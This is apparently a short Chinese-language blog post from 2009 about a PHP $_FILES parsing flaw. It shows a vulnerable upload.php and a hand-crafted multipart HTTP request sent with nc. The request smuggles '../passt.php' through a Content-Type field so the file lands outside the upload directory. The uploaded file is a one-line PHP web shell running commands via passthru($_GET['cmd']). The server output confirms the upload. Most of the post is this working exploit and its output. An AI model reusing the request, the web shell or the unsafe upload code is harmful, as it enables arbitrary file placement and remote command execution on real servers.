原文:http://www.wisec.it/news.php?page=1&lang=it
鸟文没太看明白,摸索了一下,$_FILE数组元素解析的问题。
搭个php的环境,目录在C:\www下,根目录下有个upload.php代码如下
<?php
$uploaddir = 'c:/www/';
$uploadfile = $uploaddir . $_FILES['user_file']['name'];
print "<pre>";
if (is_uploaded_file($_FILES['user_file']['tmp_name']) && move_uploaded_file($_FILES['user_file']['tmp_name'], $uploadfile)) {
print "File is valid, and was successfully uploaded. ";
print "Here's some more debugging info:\n";
print_r($_FILES);
} else {
print "Possible file upload attack! Here's some debugging info:\n";
print_r($_FILES);
}
print "</pre>";
?>
使用nc,发送修改过的包,添加了一个段(暂且叫段吧,大家应该能看明白),主要修改了其中的Content-Type的值,发包内容如下:
POST /upload.php HTTP/1.1
Accept: */*
Referer: http://localhost/upload.html
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d915736b07cc
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: localhost
Content-Length: 477
Connection: Keep-Alive
Cache-Control: no-cache
-----------------------------7d915736b07cc
Content-Disposition: form-data; name="user[file[name]123"; filename="a.php"
Content-Type: ../passt.php
<?php
passthru($_GET['cmd']);
?>
-----------------------------7d915736b07cc--
-----------------------------7d915736b07cc
Content-Disposition: form-data; name="user[file[name]123"; filename="vg"
Content-Type: application/octet-stream
<?php
passthru($_GET['cmd']);
?>
-----------------------------7d915736b07cc--
提示结果如下:
C:\>nc localhost 80 <up.txt
HTTP/1.1 200 OK
Date: Mon, 27 Jul 2009 03:44:33 GMT
Server: Apache/2.0.50 (Win32) PHP/5.0.0
X-Powered-By: PHP/5.0.0
Content-Length: 284
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
<pre>File is valid, and was successfully uploaded. Here's some more debugging in
fo:
Array
(
[user_file] => Array
(
[name] => ../passt.php
[tmp_name] => C:\WINDOWS\TEMP\php248.tmp
[error] => 0
[size] => 34
)
)
</pre>^C
C:\>
然后C:\根目录中可以看到上传了passt.php文件。
能干嘛?不知道,别问我,我什么都不知道。
(需要$_FILES,
变量必须要有下划线“_”,这里是
“user_file”,没时间仔细研究了。)